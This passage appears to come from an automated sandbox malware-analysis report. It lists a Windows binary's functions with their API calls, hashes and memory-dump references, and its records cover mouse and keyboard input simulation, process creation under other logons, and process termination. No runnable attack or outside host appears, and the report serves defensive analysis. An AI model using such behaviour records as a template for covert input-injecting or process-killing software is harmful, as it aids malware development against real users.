                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 642888154-0
                                                                                                                        • Opcode ID: 5a7281811405253b689005ddedd236aa03596d9fc1e86deda197fc66e58b32fa
                                                                                                                        • Instruction ID: 5e9c12244d735130ff00b23ad37fff69b613d0241d8bd9dd95d616d819d8931b
                                                                                                                        • Opcode Fuzzy Hash: 5a7281811405253b689005ddedd236aa03596d9fc1e86deda197fc66e58b32fa
                                                                                                                        • Instruction Fuzzy Hash: 66415134605240EFDB15CF54C899BD57BF5BB06308F1881B5EA58AF2B2C731A845CB51
                                                                                                                        Function 00EA9FEC Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EA7D81,?,?,00000000,00000001), ref: 00EA9FFA
                                                                                                                          • Part of subcall function 00EA6B19: GetWindowRect.USER32(?,?), ref: 00EA6B2C
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EAA024
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EAA02B
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EAA05D
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EAA089
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EAA0EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4137160315-0
                                                                                                                        • Opcode ID: 43c9a0339ebf7d6024f38230a02685bf8368960bad1604dc858997ff9576df99
                                                                                                                        • Instruction ID: e3e4f0239849222615ac2a7c46c8220dd44c3afdc3f340604d1e647bcc30c2f4
                                                                                                                        • Opcode Fuzzy Hash: 43c9a0339ebf7d6024f38230a02685bf8368960bad1604dc858997ff9576df99
                                                                                                                        • Instruction Fuzzy Hash: 7831F272505305AFD720DF24EC85B9AB7E9FF89314F04092AF599EB191DB31E908CB92
                                                                                                                        Function 00E8BC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E8BCD9
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E8BCE0
                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E8BCEF
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00E8BCFA
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E8BD29
                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E8BD3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1413079979-0
                                                                                                                        • Opcode ID: f3b3bb6def3077b6cce1e52a2477a79ebd76e648b32a0c2c87a7d16dde47ae48
                                                                                                                        • Instruction ID: b7ef625e88a1c93fb95652477dd50908c2f51f0f7c21c15982b7b40827f25e3a
                                                                                                                        • Opcode Fuzzy Hash: f3b3bb6def3077b6cce1e52a2477a79ebd76e648b32a0c2c87a7d16dde47ae48
                                                                                                                        • Instruction Fuzzy Hash: 4D218B72145209AFCF01AFA9ED49BEE7BA9EF44308F045015FA08B6161C776CD65DB60
                                                                                                                        Function 00EBE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                          • Part of subcall function 00E6B58B: BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EBE9F2
                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00EBEA06
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EBEA14
                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00EBEA24
                                                                                                                        • EndPath.GDI32(00000000), ref: 00EBEA34
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00EBEA44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: cfccc80269c8e1dcf3ea2c93fb334c94c251671215e9beff4ffaabe172543458
                                                                                                                        • Instruction ID: 4e69457d1045e3bad404de215b4ed3c575a094bd9088b1aef51c65d435129880
                                                                                                                        • Opcode Fuzzy Hash: cfccc80269c8e1dcf3ea2c93fb334c94c251671215e9beff4ffaabe172543458
                                                                                                                        • Instruction Fuzzy Hash: 8611C97600514DBFDF129F91EC88EDA7FADFB08364F048012FA1969160D7719D59DBA0
                                                                                                                        Function 00E8EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00E8EFB6
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E8EFC7
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E8EFCE
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00E8EFD6
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E8EFED
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00E8EFFF
                                                                                                                          • Part of subcall function 00E8A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00E8A79D,00000000,00000000,?,00E8AB73), ref: 00E8B2CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 603618608-0
                                                                                                                        • Opcode ID: c1d596344428c919337a405f6c6532d061035973efbe227affa4c788a36e846e
                                                                                                                        • Instruction ID: ab68562f575b4e9671993e689baf19efdf96601a1fd18ed114606d9186859cad
                                                                                                                        • Opcode Fuzzy Hash: c1d596344428c919337a405f6c6532d061035973efbe227affa4c788a36e846e
                                                                                                                        • Instruction Fuzzy Hash: CD018875A41209BFEB109BA69C45B5EBFB8EB48355F044066FA08BB390D6709C00CB61
                                                                                                                        Function 00E787D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 00E787D7
                                                                                                                          • Part of subcall function 00E71E5A: __initp_misc_winsig.LIBCMT ref: 00E71E7E
                                                                                                                          • Part of subcall function 00E71E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E78BE1
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E78BF5
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E78C08
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E78C1B
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E78C2E
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E78C41
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E78C54
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E78C67
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E78C7A
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E78C8D
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E78CA0
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E78CB3
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E78CC6
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E78CD9
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E78CEC
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E78CFF
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00E787DC
                                                                                                                          • Part of subcall function 00E78AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0AC68,00000FA0,?,?,00E787E1,00E76AFA,00F067D8,00000014), ref: 00E78AD1
                                                                                                                        • __mtterm.LIBCMT ref: 00E787E5
                                                                                                                          • Part of subcall function 00E7884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E787EA,00E76AFA,00F067D8,00000014), ref: 00E789CF
                                                                                                                          • Part of subcall function 00E7884D: _free.LIBCMT ref: 00E789D6
                                                                                                                          • Part of subcall function 00E7884D: DeleteCriticalSection.KERNEL32(00F0AC68,?,?,00E787EA,00E76AFA,00F067D8,00000014), ref: 00E789F8
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7880A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E78833
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2942034483-0
                                                                                                                        • Opcode ID: 2ed1f3f449d269fe277a1ff63a70e75ab33e52f3d5126164ffc06d6aef7a52de
                                                                                                                        • Instruction ID: dd66d4829bef83170569b1ec22c956d1c0a0d597099e3165c55d898eaaa91f7a
                                                                                                                        • Opcode Fuzzy Hash: 2ed1f3f449d269fe277a1ff63a70e75ab33e52f3d5126164ffc06d6aef7a52de
                                                                                                                        • Instruction Fuzzy Hash: 59F090321997115AF2687B787E0F64A2AD0DF21778BA4FA2AF46DF50D2FF1088425151
                                                                                                                        Function 00E9A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1423608774-0
                                                                                                                        • Opcode ID: 5a8000859c8dd40b8f5f502f42fed3704831ef1d61172eea66d4a1e75d147096
                                                                                                                        • Instruction ID: 561447a8f064520718ada38803c43bda3535f3cf267823f0e4a175b8d5435362
                                                                                                                        • Opcode Fuzzy Hash: 5a8000859c8dd40b8f5f502f42fed3704831ef1d61172eea66d4a1e75d147096
                                                                                                                        • Instruction Fuzzy Hash: C3018132106211EFDB156B69FD48EEF77A9FF89702B44152AF503B20A1DB60A804CB91
                                                                                                                        Function 00E51867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E51898
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E518A0
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E518AB
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E518B6
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E518BE
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E518C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: 0d14a8422fe3ddcba9f8e342f8e7db5d27e8bae0baceb988caca367dc67ffe14
                                                                                                                        • Instruction ID: e12f2bca7b3826c513a76634e0f34391001764f5ae449312ee65d960f9823897
                                                                                                                        • Opcode Fuzzy Hash: 0d14a8422fe3ddcba9f8e342f8e7db5d27e8bae0baceb988caca367dc67ffe14
                                                                                                                        • Instruction Fuzzy Hash: 390167B0942B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A868CBE5
                                                                                                                        Function 00E984F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E98504
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9851A
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00E98529
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98538
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98542
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: 1730ccc90170d7e8bee7729b9f003c659144365cc8e34c430592eab38941f772
                                                                                                                        • Instruction ID: 31f3408b4b36d6d944d6cdaf0141e97806cd27e4f09f0de050b23538daaaef25
                                                                                                                        • Opcode Fuzzy Hash: 1730ccc90170d7e8bee7729b9f003c659144365cc8e34c430592eab38941f772
                                                                                                                        • Instruction Fuzzy Hash: 86F03A72246158BFE7215B63AD0EEEF7B7CDFC6B15F00005AFA15A1050EBA06A09C6B5
                                                                                                                        Function 00E9A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00E9A330
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A341
                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A34E
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A35B
                                                                                                                          • Part of subcall function 00E99CCE: CloseHandle.KERNEL32(?,?,00E9A368,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E99CD8
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9A36E
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A375
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: c330851a9ae48c893eba5f2eac60c2b7ea2e7715909857dff2e23063098d594c
                                                                                                                        • Instruction ID: a2cc5678807ea604beada78a3418d3788072e199841fbee263d998205db87fec
                                                                                                                        • Opcode Fuzzy Hash: c330851a9ae48c893eba5f2eac60c2b7ea2e7715909857dff2e23063098d594c
                                                                                                                        • Instruction Fuzzy Hash: 55F05E3214A211AFD7112B69FD4CEEF7B79EF89702B441522F202B10B1DBB59805CB51
                                                                                                                        Function 00E5C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 00E5C419
                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00E96653,?,?,00000000), ref: 00E5C495
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead_memmove
                                                                                                                        • String ID: Sf
                                                                                                                        • API String ID: 1325644223-3555655682
                                                                                                                        • Opcode ID: 0f1e31c2580ba4fa7de36c6ee3ab3c74f95ea4e4c736bc1bbf9bf3e529255ba9
                                                                                                                        • Instruction ID: bb8789bd4bfb1986aba4e7f922fb84c771201808acd30a369e564f5fd368f6eb
                                                                                                                        • Opcode Fuzzy Hash: 0f1e31c2580ba4fa7de36c6ee3ab3c74f95ea4e4c736bc1bbf9bf3e529255ba9
                                                                                                                        • Instruction Fuzzy Hash: DFA1EF70A04209EFDB00CF55C9A0BADFBB0FF05301F24D999E865AB281D735D969DBA1
                                                                                                                        Function 00E6D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00E5BBD9: _memmove.LIBCMT ref: 00E5BC33
                                                                                                                        • __swprintf.LIBCMT ref: 00E6D98F
                                                                                                                        Strings
                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E6D832
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                        • Opcode ID: 037ebf2a2fee65f17d056244940438ec9aaef46e1d4537c29f633ca8a2c5b4d2
                                                                                                                        • Instruction ID: 10f7624f5df10f79f339433ee6f97e2a6bd4015ec2f8f3101de699c16298ead0
                                                                                                                        • Opcode Fuzzy Hash: 037ebf2a2fee65f17d056244940438ec9aaef46e1d4537c29f633ca8a2c5b4d2
                                                                                                                        • Instruction Fuzzy Hash: 1591AC326083019FC714EF24DD85DAEB7E4EF85704F40692DF896A72A1DB61ED09CB52
